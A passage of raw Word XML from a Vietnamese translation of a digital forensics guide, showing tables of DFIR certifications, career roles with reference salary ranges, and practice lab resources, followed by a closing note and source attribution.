        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09544A9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Pháp chứng Windows, chứng chỉ DFIR chuyên dụng có uy tín.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="498ECD59">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19673D6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GCFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="148840E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Pháp chứng nâng cao, bộ nhớ, mã độc và artefact phức tạp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0286D94C">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6F59062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GCIH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0536444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Incident response và xử lý sự cố, phù hợp đội DFIR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="70FC0D5D">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6343DD5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EnCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E53BDA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Chứng chỉ EnCase, thường gặp trong thực thi pháp luật và môi trường thương mại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="42A18895">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0EB19F4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Cellebrite CCPA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C3E9DF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Pháp chứng di động và physical extraction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A7C573B">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5EFA995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FOR500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25AD6DB5">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SANS Windows Forensic Analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0ED20683">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1D351C4D">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FOR508</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CDFB40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SANS Advanced DFIR, Threat Hunting và Memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72B90645">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31BDF63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FOR572</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4011F23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SANS Advanced Network Forensics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="81"/>
    </w:tbl>
    <w:p w14:paraId="13803FA3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="X552766984f37e4d693c83038f4217a8847b4d7f"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16.2. Vai trò nghề nghiệp và mức lương tham khảo trong tài liệu gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9DC67">
      <w:pPr>
        <w:pStyle w:val="14"/>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Các con số sau là mức USD được tài liệu nguồn ghi cho năm 2026; thị trường, quốc gia, kinh nghiệm và loại hình doanh nghiệp có thể làm mức thực tế khác đáng kể.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2463"/>
        <w:gridCol w:w="7583"/>
      </w:tblGrid>
      <w:tr w14:paraId="208436E0">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6D85B0F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Vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="631D141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Phạm vi công việc và mức tham khảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14D589D3">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64BE4AD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DFIR Analyst - Junior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="109646DB">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Điều tra SOC, xử lý alert và pháp chứng cơ bản: 60.000-90.000 USD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="66822414">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4E9F593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DFIR Analyst - Senior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1430AA8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Toàn bộ vòng đời sự cố, kiểm tra pháp chứng và làm việc với khách hàng: 90.000-140.000 USD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7BFB000F">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31903EA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Forensic Examiner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="365269F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Chứng cứ đạt chuẩn tòa án, nhân chứng chuyên gia và quản lý vụ việc phức tạp: 85.000-150.000 USD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6139BAC6">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30BD9008">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Incident Response Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D1F4CD9">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Điều phối nhiều khách hàng, lãnh đạo đội và thông báo vi phạm: 120.000-185.000 USD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6FD823E1">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06D8F88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Threat Intelligence Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="223DA96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Theo dõi chiến dịch, attribution, sản xuất intelligence và tích hợp DFIR: 95.000-165.000 USD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="620E64E2">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5213E19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DFIR Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78B2C58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Tư vấn ứng phó khẩn cấp và đánh giá sau sự cố: 130.000-220.000 USD trở lên.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="085142A4">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1AE2360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CISO/Head of DFIR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A236B5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Lãnh đạo chương trình, chiến lược và quản lý đội: 180.000-300.000 USD trở lên.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="82"/>
    </w:tbl>
    <w:p w14:paraId="6B21E567">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="tài-nguyên-xây-dựng-phòng-lab"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16.3. Tài nguyên xây dựng phòng lab</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2742"/>
        <w:gridCol w:w="7304"/>
      </w:tblGrid>
      <w:tr w14:paraId="5E721C4E">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25D810F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Tài nguyên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F5F0B1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b/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4A0648E1">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45BAADA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SIFT Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A299F36">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VM miễn phí của SANS, bộ công cụ pháp chứng Linux hoàn chỉnh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="606621D8">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7F5EBCF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Flare VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7934275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Môi trường Windows phân tích mã độc của Mandiant, bổ trợ SIFT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C8D89E7">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7856B14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DetectionLab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="648B31A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Lab Windows domain và ELK dựa trên Vagrant/Packer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72E3175C">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7BD5852C">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Digital Corpora</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B4BACC4">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Ảnh vụ việc thực hành hợp pháp để rèn kỹ năng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1CA4C6CD">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273524E0">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DFIR.training</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D8C4DD3">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Tài nguyên, thử thách và bài tập DFIR miễn phí được tuyển chọn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1096EDF9">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1CEC267E">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CyberDefenders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58693767">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Nền tảng CTF với thử thách bộ nhớ, ổ đĩa và mạng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4081A3DA">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FCD46B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Blue Team Labs Online</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EA29912">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Bài tập DFIR có hướng dẫn và chứng cứ thực tế.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51BAE8D3">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77AD449A">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Splunk Boss of the SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31FF2E2F">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CTF hằng năm với lượng chứng cứ điều tra lớn và kho bài cũ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="83"/>
    </w:tbl>
    <w:p w14:paraId="54D9DF63">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="kết-lời"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kết lời</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A410733">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing w:line="360"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Chứng cứ không bao giờ nói dối. Nó chỉ chờ được tìm thấy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253948A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9C3AD2">
      <w:pPr>
        <w:pStyle w:val="25"/>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Nguồn nội dung: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Digital Forensics Complete Guide - The Cyber Bite, 2026 Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Bản tiếng Việt này được biên soạn để hỗ trợ học tập; các lệnh cần được thực hiện trong môi trường được ủy quyền và cô lập phù hợp.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="964" w:right="1020" w:bottom="964" w:left="1020" w:header="397" w:footer="397"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Liberation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DejaVu Sans Mono">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8DEF01">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans"/>
        <w:color w:val="66666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95199">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="00A6C7" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:color w:val="auto"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>ĐIỀU TRA SỐ - HƯỚNG DẪN TOÀN DIỆN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splitPgBreakAndParaMark/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="10C229D3"/>
    <w:rsid w:val="2EA56347"/>
    <w:rsid w:val="455276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9" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Liberation Sans" w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"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vi-VN" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>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paragraph" w:styleId="21">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="22">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="19"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="24"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Liberation Sans"/>
      <w:color w:val="2F75B5"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="17365D"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="36"/>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vi-VN" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
